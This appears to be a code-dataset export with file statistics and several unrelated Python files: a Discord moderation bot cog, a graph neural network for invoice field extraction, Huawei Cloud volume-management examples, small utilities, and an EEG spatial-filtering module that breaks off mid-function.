| 31.130137 | 81 | 0.738614 | 720 | 4,545 | 4.455556 | 0.288889 | 0.072007 | 0.042082 | 0.061721 | 0.418329 | 0.409289 | 0.402431 | 0.324813 | 0.302993 | 0.264027 | 0 | 0.017114 | 0.164356 | 4,545 | 145 | 82 | 31.344828 | 0.827541 | 0.312211 | 0 | 0.3625 | 0 | 0 | 0.093628 | 0 | 0 | 0 | 0 | 0 | 0.1625 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.1375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
774e392147c2efbc920f76f60f3cecfcdbfd8de5 | 4,701 | py | Python | cogs/moderation.py | pratishrai/doraemon | 5621074eac3305c9fa5182ee190d5dbb02151b6b | [
"MIT"
] | 12 | 2020-07-01T09:27:14.000Z | 2022-01-27T07:56:42.000Z | cogs/moderation.py | pratishrai/doraemon | 5621074eac3305c9fa5182ee190d5dbb02151b6b | [
"MIT"
] | 7 | 2020-10-01T17:24:27.000Z | 2022-01-03T11:01:57.000Z | cogs/moderation.py | programming-wizard/doraemon | 3441050d972b3a380f01d7a6d3faa21fa2eab785 | [
"MIT"
] | 1 | 2020-06-12T01:17:24.000Z | 2020-06-12T01:17:24.000Z | import discord
from discord.ext import commands
class Moderation(commands.Cog, name="Moderation"):
def __init__(self, client):
self.client = client
@commands.command(aliases=["c"])
@commands.has_permissions(manage_messages=True)
async def clear(self, ctx, amount=1):
await ctx.channel.purge(limit=amount, before=ctx.message)
await ctx.message.delete()
@commands.command(aliases=["yeet"])
@commands.has_permissions(kick_members=True)
async def kick(self, ctx, member: discord.Member, *, reason=None):
embed = discord.Embed(
title="Kicked",
colour=0x2859B8,
description=f"{member.mention} has been kicked.",
)
await member.kick(reason=reason)
await ctx.send(embed=embed)
@commands.command()
@commands.has_permissions(ban_members=True)
async def ban(self, ctx, member: discord.Member, *, reason=None):
embed = discord.Embed(
title="Banned",
colour=0x2859B8,
description=f"{member.mention} has been banned.",
)
await member.ban(reason=reason)
await ctx.send(embed=embed)
@commands.command()
@commands.has_permissions(ban_members=True)
async def unban(self, ctx, *, member):
banned_users = await ctx.guild.bans()
member_name, member_discriminator = member.split("#")
for ban_entry in banned_users:
user = ban_entry.user
if (user.name, user.discriminator) == (member_name, member_discriminator):
await ctx.guild.unban(user)
embed = discord.Embed(
title="Banned",
colour=0x2859B8,
description=f"{user.mention} has been unbanned.",
)
await ctx.send(embed=embed)
return
embed = discord.Embed(
title="None", colour=0x2859B8, description=f"No such user was found banned."
)
await ctx.send(embed=embed)
@commands.command()
async def info(self, ctx, member: discord.Member = None):
async with ctx.channel.typing():
member = ctx.author if not member else member
roles = [role for role in member.roles]
embed = discord.Embed(color=member.color, timestamp=ctx.message.created_at)
embed.set_author(name=f"User Info - {member}")
embed.set_thumbnail(url=member.avatar_url)
embed.set_footer(
text=f"Requested by {ctx.author}", icon_url=ctx.author.avatar_url
)
embed.add_field(name="ID:", value=member.id)
embed.add_field(name="Name:", value=member.display_name)
embed.add_field(
name=f"Created at:",
value=member.created_at.strftime("%a, %#d %B %Y, %I:%M %p UTC"),
)
embed.add_field(
name=f"Joined at:",
value=member.joined_at.strftime("%a, %#d %B %Y, %I:%M %p UTC"),
)
embed.add_field(
name=f"Roles({len(roles)})",
value=" ".join([role.mention for role in roles]),
)
embed.add_field(name="Top role: ", value=member.top_role.mention)
embed.add_field(name="Bot? ", value=member.bot)
await ctx.send(embed=embed)
@commands.command(aliases=["sinfo"])
async def serverinfo(self, ctx):
async with ctx.channel.typing():
embed = discord.Embed(color=0x2859B8, timestamp=ctx.message.created_at)
embed.set_author(name=f"Guild Info - {ctx.guild}")
embed.set_thumbnail(url=ctx.guild.icon_url)
embed.set_footer(
text=f"Requested by {ctx.author}", icon_url=ctx.author.avatar_url
)
embed.add_field(name="ID:", value=ctx.guild.id)
embed.add_field(name="Owner:", value=ctx.guild.owner)
embed.add_field(
name=f"Created at:",
value=ctx.guild.created_at.strftime("%a, %#d %B %Y, %I:%M %p UTC"),
)
embed.add_field(name=f"Region:", value=ctx.guild.region)
embed.add_field(
name=f"Verification Level", value=ctx.guild.verification_level
)
embed.add_field(name="Members", value=len(ctx.guild.members))
embed.add_field(name="Channels", value=len(ctx.guild.channels))
embed.add_field(name="Emojis", value=len(ctx.guild.emojis))
embed.add_field(name="Roles", value=len(ctx.guild.roles))
await ctx.send(embed=embed)
def setup(client):
client.add_cog(Moderation(client))
| 37.608 | 88 | 0.583706 | 565 | 4,701 | 4.755752 | 0.20708 | 0.047637 | 0.07741 | 0.101228 | 0.436174 | 0.370674 | 0.370674 | 0.343134 | 0.294753 | 0.262747 | 0 | 0.00927 | 0.288662 | 4,701 | 124 | 89 | 37.91129 | 0.794258 | 0 | 0 | 0.317308 | 0 | 0 | 0.102531 | 0 | 0 | 0 | 0.008509 | 0 | 0 | 1 | 0.019231 | false | 0 | 0.019231 | 0 | 0.057692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
774f86d02aa10f5aa07fe37feeabc706964b1a91 | 10,274 | py | Python | models/kie/gated_gcn.py | huyhoang17/KIE_invoice_minimal | 72b8469195e68c83e7ee373a551bb6dd00cabc7e | [
"MIT"
] | 17 | 2021-11-08T09:39:32.000Z | 2022-03-15T02:14:40.000Z | models/kie/gated_gcn.py | chuongnvk54/KIE_invoice_minimal | c8282818b9bf0699a1656dede9a26d5babaefabc | [
"MIT"
] | 1 | 2021-11-11T15:36:36.000Z | 2021-11-15T07:44:58.000Z | models/kie/gated_gcn.py | chuongnvk54/KIE_invoice_minimal | c8282818b9bf0699a1656dede9a26d5babaefabc | [
"MIT"
] | 2 | 2022-01-18T07:10:45.000Z | 2022-02-25T09:37:49.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import LSTM
from torch.nn.utils.rnn import pack_padded_sequence
import numpy as np
from models.kie.graph_norm import GraphNorm
"""
ResGatedGCN: Residual Gated Graph ConvNets
An Experimental Study of Neural Networks for Variable Graphs (Xavier Bresson and Thomas Laurent, ICLR 2018)
https://arxiv.org/pdf/1711.07553v2.pdf
"""
class MLPReadout(nn.Module):
def __init__(self, input_dim, output_dim, L=2): # L=nb_hidden_layers
super().__init__()
list_FC_layers = [
nn.Linear(input_dim // 2 ** l, input_dim // 2 ** (l + 1), bias=True)
for l in range(L)
]
list_FC_layers.append(nn.Linear(input_dim // 2 ** L, output_dim, bias=True))
self.FC_layers = nn.ModuleList(list_FC_layers)
self.L = L
def forward(self, x):
y = x
for l in range(self.L):
y = self.FC_layers[l](y)
y = F.relu(y)
y = self.FC_layers[self.L](y)
return y
class GatedGCNLayer(nn.Module):
"""
Param: []
"""
def __init__(
self, input_dim, output_dim, dropout, graph_norm, batch_norm, residual=False
):
super().__init__()
self.in_channels = input_dim
self.out_channels = output_dim
self.dropout = dropout
self.graph_norm = graph_norm
self.batch_norm = batch_norm
self.residual = residual
if input_dim != output_dim:
self.residual = False
self.A = nn.Linear(input_dim, output_dim, bias=True)
self.B = nn.Linear(input_dim, output_dim, bias=True)
self.C = nn.Linear(input_dim, output_dim, bias=True)
self.D = nn.Linear(input_dim, output_dim, bias=True)
self.E = nn.Linear(input_dim, output_dim, bias=True)
self.bn_node_h = GraphNorm(output_dim)
self.bn_node_e = GraphNorm(output_dim)
def message_func(self, edges):
Bh_j = edges.src["Bh"]
e_ij = (
edges.data["Ce"] + edges.src["Dh"] + edges.dst["Eh"]
) # e_ij = Ce_ij + Dhi + Ehj
edges.data["e"] = e_ij
return {"Bh_j": Bh_j, "e_ij": e_ij}
def reduce_func(self, nodes):
Ah_i = nodes.data["Ah"]
Bh_j = nodes.mailbox["Bh_j"]
e = nodes.mailbox["e_ij"]
sigma_ij = torch.sigmoid(e) # sigma_ij = sigmoid(e_ij)
# h = Ah_i + torch.mean( sigma_ij * Bh_j, dim=1 ) # hi = Ahi + mean_j alpha_ij * Bhj
h = Ah_i + torch.sum(sigma_ij * Bh_j, dim=1) / (
torch.sum(sigma_ij, dim=1) + 1e-6
) # hi = Ahi + sum_j eta_ij/sum_j' eta_ij' * Bhj <= dense attention
return {"h": h}
def forward(self, g, h, e, snorm_n, snorm_e, graph_node_size, graph_edge_size):
h_in = h # for residual connection
e_in = e # for residual connection
g.ndata["h"] = h
g.ndata["Ah"] = self.A(h)
g.ndata["Bh"] = self.B(h)
g.ndata["Dh"] = self.D(h)
g.ndata["Eh"] = self.E(h)
g.edata["e"] = e
g.edata["Ce"] = self.C(e)
g.update_all(self.message_func, self.reduce_func)
h = g.ndata["h"] # result of graph convolution
e = g.edata["e"] # result of graph convolution
if self.graph_norm:
h = h * snorm_n # normalize activation w.r.t. graph size
e = e * snorm_e # normalize activation w.r.t. graph size
if self.batch_norm:
h = self.bn_node_h(h, graph_node_size) # graph normalization
e = self.bn_node_e(e, graph_edge_size) # graph normalization
h = F.relu(h) # non-linear activation
e = F.relu(e) # non-linear activation
if self.residual:
h = h_in + h # residual connection
e = e_in + e # residual connection
h = F.dropout(h, self.dropout, training=self.training)
e = F.dropout(e, self.dropout, training=self.training)
return h, e
def __repr__(self):
return "{}(in_channels={}, out_channels={})".format(
self.__class__.__name__, self.in_channels, self.out_channels
)
class DenseLayer(nn.Module):
def __init__(self, in_dim, out_dim):
super().__init__()
# self.bn = nn.BatchNorm1d(in_dim)
self.bn = nn.LayerNorm(in_dim)
self.linear = nn.Linear(in_dim, out_dim)
def forward(self, feat):
feat = self.bn(feat)
feat = F.relu(feat)
feat = self.linear(feat)
return feat
class GatedGCNNet(nn.Module):
def __init__(self, net_params):
super().__init__()
in_dim_text = net_params["in_dim_text"]
in_dim_node = net_params["in_dim_node"] # node_dim (feat is an integer)
in_dim_edge = net_params["in_dim_edge"] # edge_dim (feat is a float)
hidden_dim = net_params["hidden_dim"]
n_classes = net_params["n_classes"]
dropout = net_params["dropout"]
n_layers = net_params["L"]
self.ohem = net_params["OHEM"]
self.readout = net_params["readout"]
self.graph_norm = net_params["graph_norm"]
self.batch_norm = net_params["batch_norm"]
self.residual = net_params["residual"]
self.n_classes = n_classes
self.device = net_params["device"]
self.embedding_text = nn.Embedding(
in_dim_text, hidden_dim
) # node feat is an integer
self.embedding_h = nn.Linear(in_dim_node, hidden_dim) # edge feat is a float
self.embedding_e = nn.Linear(in_dim_edge, hidden_dim) # edge feat is a float
self.layers = nn.ModuleList(
[
GatedGCNLayer(
hidden_dim,
hidden_dim,
dropout,
self.graph_norm,
self.batch_norm,
self.residual,
)
for _ in range(n_layers)
]
)
self.dense_layers = nn.ModuleList(
[
DenseLayer(hidden_dim + i * hidden_dim, hidden_dim)
for i in range(1, n_layers + 1)
]
)
self.lstm = LSTM(
input_size=hidden_dim,
hidden_size=hidden_dim,
num_layers=1,
batch_first=True,
bidirectional=True,
)
self.MLP_layer = MLPReadout(hidden_dim, n_classes)
self.criterion = nn.CrossEntropyLoss(ignore_index=-100)
def lstm_text_embeding(self, text, text_length):
# FIXED
packed_sequence = pack_padded_sequence(
text, text_length.cpu(), batch_first=True, enforce_sorted=False
)
# packed_sequence = packed_sequence.to("cuda")
outputs_packed, (h_last, c_last) = self.lstm(packed_sequence)
# outputs, _ = pad_packed_sequence(outputs_packed)
return h_last.mean(0)
def clamp(self):
min = torch.tensor(0.0).cuda()
with torch.no_grad():
for m in self.modules():
if isinstance(m, UnifiedNorm):
m.lambda_batch.masked_fill_(m.lambda_batch < 0, min)
m.lambda_graph.masked_fill_(m.lambda_graph < 0, min)
m.lambda_adja.masked_fill_(m.lambda_adja < 0, min)
m.lambda_node.masked_fill_(m.lambda_node < 0, min)
def concat(self, h_list, l):
h_concat = torch.cat(h_list, dim=1)
h = self.dense_layers[l](h_concat)
return h
def forward(
self,
g,
h,
e,
text,
text_length,
snorm_n,
snorm_e,
graph_node_size,
graph_edge_size,
):
# input embedding
h_embeding = self.embedding_h(h)
e_embeding = self.embedding_e(e)
# FIXED
text_embeding = self.embedding_text(text.long())
text_embeding = self.lstm_text_embeding(text_embeding, text_length)
text_embeding = F.normalize(text_embeding)
e = e_embeding
h = h_embeding + text_embeding
all_h = [h]
for i, conv in enumerate(self.layers):
h1, e = conv(g, h, e, snorm_n, snorm_e, graph_node_size, graph_edge_size)
all_h.append(h1)
h = self.concat(all_h, i)
# output
h_out = self.MLP_layer(h)
return h_out
def _ohem(self, pred, label):
# import pdb; pdb.set_trace()
pred = pred.data.cpu().numpy()
label = label.data.cpu().numpy()
pos_num = sum(label != 0)
neg_num = pos_num * self.ohem
pred_value = pred[:, 1:].max(1)
neg_score_sorted = np.sort(-pred_value[label == 0])
if neg_score_sorted.shape[0] > neg_num:
threshold = -neg_score_sorted[neg_num - 1]
mask = (pred_value >= threshold) | (label != 0)
else:
mask = label != -1
return torch.from_numpy(mask)
def loss(self, pred, label):
mask_label = label.clone()
mask = self._ohem(pred, label)
mask = mask.to(pred.device)
mask_label[mask == False] = -100
loss = self.criterion(pred, mask_label)
# calculating label weights for weighted loss computation
# V = label.size(0)
# label_count = torch.bincount(label)
# label_count = label_count[label_count.nonzero()].squeeze()
# cluster_sizes = torch.zeros(self.n_classes).long().to(self.device)
# cluster_sizes[torch.unique(label)] = label_count
# weight = (V - cluster_sizes).float() / V
# weight *= (cluster_sizes>0).float()
# # weighted cross-entropy for unbalanced classes
# criterion = nn.CrossEntropyLoss(weight=weight)
# loss = criterion(pred, label)
return loss
if __name__ == "__main__":
net_params = {}
net_params["in_dim"] = 1
net_params["hidden_dim"] = 256
net_params["out_dim"] = 256
net_params["n_classes"] = 5
net_params["in_feat_dropout"] = 0.1
net_params["dropout"] = 0.1
net_params["L"] = 5
net_params["readout"] = True
net_params["graph_norm"] = True
net_params["batch_norm"] = True
net_params["residual"] = True
net_params["device"] = "cuda"
net = GatedGCNNet(net_params)
print(net)
| 32.206897 | 111 | 0.580008 | 1,390 | 10,274 | 4.020863 | 0.17554 | 0.045089 | 0.020039 | 0.024334 | 0.144749 | 0.103417 | 0.091966 | 0.064949 | 0.054571 | 0.021471 | 0 | 0.00939 | 0.305529 | 10,274 | 318 | 112 | 32.308176 | 0.773931 | 0.129453 | 0 | 0.034483 | 0 | 0 | 0.033422 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.030172 | 0.00431 | 0.163793 | 0.00431 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7750932a0118ae42185cc09da01e6d0df4656352 | 468 | py | Python | study_algorithm/python/Recursion/permute.py | AlphaSunny/study | 4e65127fefa9078b7ae6b9db92369c93e61e4327 | [
"MIT"
] | null | null | null | study_algorithm/python/Recursion/permute.py | AlphaSunny/study | 4e65127fefa9078b7ae6b9db92369c93e61e4327 | [
"MIT"
] | null | null | null | study_algorithm/python/Recursion/permute.py | AlphaSunny/study | 4e65127fefa9078b7ae6b9db92369c93e61e4327 | [
"MIT"
] | null | null | null | def permute(s):
out = []
# Base Case
if len(s) == 1:
out = [s]
else:
# For every letter in string
for i, let in enumerate(s):
# For every permutation resulting from Step 2 and 3 described above
for perm in permute(s[:i] + s[i+1:]):
# Add it to output
out += [let + perm]
return out
permute('abc') | 21.272727 | 80 | 0.418803 | 55 | 468 | 3.563636 | 0.618182 | 0.081633 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016736 | 0.489316 | 468 | 22 | 81 | 21.272727 | 0.803347 | 0.254274 | 0 | 0 | 0 | 0 | 0.009259 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7750a9d478d94ac8bcc4800eb6dad04bf18e970a | 386 | py | Python | molsysmt/_private/digestion/viewers.py | uibcdf/MolModMTs | 4f6b6f671a9fa3e73008d1e9c48686d5f20a6573 | [
"MIT"
] | null | null | null | molsysmt/_private/digestion/viewers.py | uibcdf/MolModMTs | 4f6b6f671a9fa3e73008d1e9c48686d5f20a6573 | [
"MIT"
] | null | null | null | molsysmt/_private/digestion/viewers.py | uibcdf/MolModMTs | 4f6b6f671a9fa3e73008d1e9c48686d5f20a6573 | [
"MIT"
] | null | null | null | from ..exceptions import *
viewers_forms = {
'NGLView' : 'nglview.NGLWidget',
}
viewer_from_lowercase={ ii.lower() : ii for ii in viewers_forms }
def digest_viewer(viewer):
try:
tmp_viewer = viewer_from_lowercase[viewer.lower()]
tmp_viewer_form = viewers_forms[tmp_viewer]
return tmp_viewer, tmp_viewer_form
except:
raise BadCallError()
| 21.444444 | 65 | 0.686528 | 47 | 386 | 5.319149 | 0.468085 | 0.18 | 0.152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.217617 | 386 | 17 | 66 | 22.705882 | 0.827815 | 0 | 0 | 0 | 0 | 0 | 0.062338 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
77518d24dd92a2a87d6fe37aa0005290be04a5ec | 4,884 | py | Python | examples/block_store/v2/volume.py | wangrui1121/huaweicloud-sdk-python | 240abe00288760115d1791012d4e3c4592d77ad1 | [
"Apache-2.0"
] | 43 | 2018-12-19T08:39:15.000Z | 2021-07-21T02:45:43.000Z | examples/block_store/v2/volume.py | wangrui1121/huaweicloud-sdk-python | 240abe00288760115d1791012d4e3c4592d77ad1 | [
"Apache-2.0"
] | 11 | 2019-03-17T13:28:56.000Z | 2020-09-23T23:57:50.000Z | examples/block_store/v2/volume.py | wangrui1121/huaweicloud-sdk-python | 240abe00288760115d1791012d4e3c4592d77ad1 | [
"Apache-2.0"
] | 47 | 2018-12-19T05:14:25.000Z | 2022-03-19T15:28:30.000Z | # -*- coding:utf-8 -*-
# Copyright 2019 Huawei Technologies Co.,Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy of the
# License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
import os
from openstack import connection
# create connection
username = "xxxxxx"
password = os.getenv('get_secret_code')
projectId = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # tenant ID
userDomainId = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # user account ID
auth_url = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # endpoint url
conn = connection.Connection(auth_url=auth_url,
user_domain_id=userDomainId,
project_id=projectId,
username=username,
password=password)
# create volume
def create_volume():
data = {
"name": "volume_name",
"availability_zone": "xxx",
"description": "volume_description",
"volume_type": "SATA",
"metadata": {
"__system__encrypted": "0"
},
"size": 10
}
volume = conn.block_store.create_volume(**data)
print(volume)
# create volume by dss
def create_volume_by_dss():
data = {
"volume": {
"name": "volume_name",
"availability_zone": "az1.dc1",
"description": "volume_description",
"volume_type": "SAS",
"size": 100,
"metadata": {},
},
"OS-SCH-HNT:scheduler_hints": {
"dedicated_storage_id": "xxx"
}
}
volume = conn.block_store.create_volume_by_dss(**data)
print(volume)
# delete volume
def delete_volume():
volume_id = "xxx"
conn.block_store.delete_volume(volume_id)
# update volume
def update_volume():
volume_id = 'xxx'
data = {
"name": "volume-name"
}
print(conn.block_store.update_volume(volume_id, **data))
# expand volume
def expand_volume():
volume_id = 'xxx'
new_size = 18
new_vloume = conn.block_store.expand_volume(volume_id, new_size)
print(new_vloume)
# volumes
def volumes():
for index in conn.block_store.volumes(details=False):
print(index)
# list volumes with paginated
def list_volumes_one_page():
for index in conn.block_store.volumes(paginated=False, limit=3):
print(index)
# get volume
def get_volume():
volume_id = 'xxx'
volume = conn.block_store.get_volume(volume_id)
print(volume)
# get quota set
def get_quota_set():
print(conn.block_store.get_quota_set(projectId))
# create volume metadata
def create_volume_metadata():
volume_id = 'xxx'
data = {
"metadata": {
"k1": "v1",
"k11": "v11",
"k111": "v111"
}
}
volume_metadata = conn.block_store.create_volume_metadata(volume_id, **data)
print(volume_metadata)
# get volume metadata
def get_volume_metadata():
volume_id = 'xxx'
volume_metadata = conn.block_store.get_volume_metadata(volume_id, key=None)
print(volume_metadata)
# update volume metadata
def update_volume_metadata():
volume_id = 'xxx'
data_all = {
"metadata": {
"k1": "v1"
}
}
volume_metadata = conn.block_store.update_volume_metadata(volume_id, key=None, **data_all)
print(volume_metadata)
# delete volume metadata
def delete_volume_metadata():
volume_id = 'xxx'
volume_metadata = conn.block_store.delete_volume_metadata(volume_id, key='delete_key')
print(volume_metadata)
# set volume bootable
def set_volume_bootable():
volume_id = 'xxx'
bootable = conn.block_store.set_volume_bootable(volume_id, True)
print(bootable)
# set volume readonly
def set_volume_readonly():
volume_id = 'xxx'
readonly = conn.block_store.set_volume_readonly(volume_id, True)
print(readonly)
# export image by volume
def export_image_by_volume():
volume_id = 'xxx'
data = {
"image_name": "make_a_image_from_volume"
}
image = conn.block_store.export_image_by_volume(volume_id, **data)
print(image)
if __name__ == '__main__':
create_volume()
create_volume_by_dss()
delete_volume()
update_volume()
expand_volume()
volumes()
list_volumes_one_page()
get_volume()
get_quota_set()
create_volume_metadata()
get_volume_metadata()
update_volume_metadata()
delete_volume_metadata()
set_volume_bootable()
set_volume_readonly()
export_image_by_volume()
| 24.918367 | 94 | 0.658272 | 592 | 4,884 | 5.143581 | 0.266892 | 0.110345 | 0.073563 | 0.0578 | 0.419704 | 0.141872 | 0.055172 | 0.034811 | 0.034811 | 0.034811 | 0 | 0.00913 | 0.23751 | 4,884 | 195 | 95 | 25.046154 | 0.808539 | 0.191441 | 0 | 0.244094 | 0 | 0 | 0.12848 | 0.034227 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125984 | false | 0.015748 | 0.015748 | 0 | 0.141732 | 0.11811 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7751953cc00999a4b9be0030e55184f50f57f424 | 418 | py | Python | main.py | Z4RD0Z/dice_thrower | 860d30691531287730f46028267b32e98a641402 | [
"MIT"
] | null | null | null | main.py | Z4RD0Z/dice_thrower | 860d30691531287730f46028267b32e98a641402 | [
"MIT"
] | null | null | null | main.py | Z4RD0Z/dice_thrower | 860d30691531287730f46028267b32e98a641402 | [
"MIT"
] | null | null | null | from dice_throwers import DiceThrowerFactory
from cli import type_list
import inquirer
ready = True
game_type = inquirer.prompt(type_list)
print(game_type)
dice_thrower = DiceThrowerFactory.create_thrower(game_type['game'])
while ready != False:
dice = input("roll-> ")
if dice == "exit" or dice == "EXIT":
ready = False
result = dice_thrower.parse_dice_string(dice.strip())
print(result)
| 22 | 67 | 0.722488 | 55 | 418 | 5.290909 | 0.490909 | 0.082474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172249 | 418 | 18 | 68 | 23.222222 | 0.84104 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.230769 | 0 | 0.230769 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
77529d71c1cfb907519a888e4c2d97fd82c94b61 | 6,237 | py | Python | code/ssd.py | ryanhammonds/ieeg-spatial-filters-ssd | a58eb13ec1b73a7ec74d3ba5f038bddcf27d8147 | [
"MIT"
] | 14 | 2021-03-01T07:25:12.000Z | 2021-12-15T20:43:34.000Z | code/ssd.py | ryanhammonds/ieeg-spatial-filters-ssd | a58eb13ec1b73a7ec74d3ba5f038bddcf27d8147 | [
"MIT"
] | null | null | null | code/ssd.py | ryanhammonds/ieeg-spatial-filters-ssd | a58eb13ec1b73a7ec74d3ba5f038bddcf27d8147 | [
"MIT"
] | 5 | 2021-03-01T07:25:01.000Z | 2021-06-06T10:03:33.000Z | """ Functions to compute Spatial-Spectral Decompostion (SSD).
Reference
---------
Nikulin VV, Nolte G, Curio G.: A novel method for reliable and fast
extraction of neuronal EEG/MEG oscillations on the basis of
spatio-spectral decomposition. Neuroimage. 2011 Apr 15;55(4):1528-35.
doi: 10.1016/j.neuroimage.2011.01.057. Epub 2011 Jan 27. PMID: 21276858.
"""
import numpy as np
from scipy.linalg import eig
import mne
def compute_ged(cov_signal, cov_noise):
"""Compute a generatlized eigenvalue decomposition maximizing principal
directions spanned by the signal contribution while minimizing directions
spanned by the noise contribution.
Parameters
----------
cov_signal : array, 2-D
Covariance matrix of the signal contribution.
cov_noise : array, 2-D
Covariance matrix of the noise contribution.
Returns
-------
filters : array
SSD spatial filter matrix, columns are individual filters.
"""
nr_channels = cov_signal.shape[0]
# check for rank-deficiency
[lambda_val, filters] = eig(cov_signal)
idx = np.argsort(lambda_val)[::-1]
filters = np.real(filters[:, idx])
lambda_val = np.real(lambda_val[idx])
tol = lambda_val[0] * 1e-6
r = np.sum(lambda_val > tol)
# if rank smaller than nr_channels make expansion
if r < nr_channels:
print("Warning: Input data is not full rank")
M = np.matmul(filters[:, :r], np.diag(lambda_val[:r] ** -0.5))
else:
M = np.diag(np.ones((nr_channels,)))
cov_signal_ex = (M.T @ cov_signal) @ M
cov_noise_ex = (M.T @ cov_noise) @ M
[lambda_val, filters] = eig(cov_signal_ex, cov_signal_ex + cov_noise_ex)
# eigenvalues should be sorted by size already, but double checking
idx = np.argsort(lambda_val)[::-1]
filters = filters[:, idx]
filters = np.matmul(M, filters)
return filters
def apply_filters(raw, filters, prefix="ssd"):
"""Apply spatial filters on continuous data.
Parameters
----------
raw : instance of Raw
Raw instance with signals to be spatially filtered.
filters : array, 2-D
Spatial filters as computed by SSD.
prefix : string | None
Prefix for renaming channels for disambiguation. If None: "ssd"
is used.
Returns
-------
raw_projected : instance of Raw
Raw instance with projected signals as traces.
"""
raw_projected = raw.copy()
components = filters.T @ raw.get_data()
nr_components = filters.shape[1]
raw_projected._data = components
ssd_channels = ["%s%i" % (prefix, i + 1) for i in range(nr_components)]
mapping = dict(zip(raw.info["ch_names"], ssd_channels))
mne.channels.rename_channels(raw_projected.info, mapping)
raw_projected.drop_channels(raw_projected.info["ch_names"][nr_components:])
return raw_projected
def compute_patterns(cov_signal, filters):
"""Compute spatial patterns for a specific covariance matrix.
Parameters
----------
cov_signal : array, 2-D
Covariance matrix of the signal contribution.
filters : array, 2-D
Spatial filters as computed by SSD.
Returns
-------
patterns : array, 2-D
Spatial patterns.
"""
top = cov_signal @ filters
bottom = (filters.T @ cov_signal) @ filters
patterns = top @ np.linalg.pinv(bottom)
return patterns
def run_ssd(raw, peak, band_width):
"""Wrapper for compute_ssd with standard settings for definining filters.
Parameters
----------
raw : instance of Raw
Raw instance with signals to be spatially filtered.
peak : float
Peak frequency of the desired signal contribution.
band_width : float
Spectral bandwidth for the desired signal contribution.
Returns
-------
filters : array, 2-D
Spatial filters as computed by SSD, each column = 1 spatial filter.
patterns : array, 2-D
Spatial patterns, with each pattern being a column vector.
"""
signal_bp = [peak - band_width, peak + band_width]
noise_bp = [peak - (band_width + 2), peak + (band_width + 2)]
noise_bs = [peak - (band_width + 1), peak + (band_width + 1)]
filters, patterns = compute_ssd(raw, signal_bp, noise_bp, noise_bs)
return filters, patterns
def compute_ssd(raw, signal_bp, noise_bp, noise_bs):
"""Compute SSD for a specific peak frequency.
Parameters
----------
raw : instance of Raw
Raw instance with signals to be spatially filtered.
signal_bp : tuple
Pass-band for defining the signal contribution. E.g. (8, 13)
noise_bp : tuple
Pass-band for defining the noise contribution.
noise_bs : tuple
Stop-band for defining the noise contribution.
Returns
-------
filters : array, 2-D
Spatial filters as computed by SSD, each column = 1 spatial filter.
patterns : array, 2-D
Spatial patterns, with each pattern being a column vector.
"""
iir_params = dict(order=2, ftype="butter", output="sos")
# bandpass filter for signal
raw_signal = raw.copy().filter(
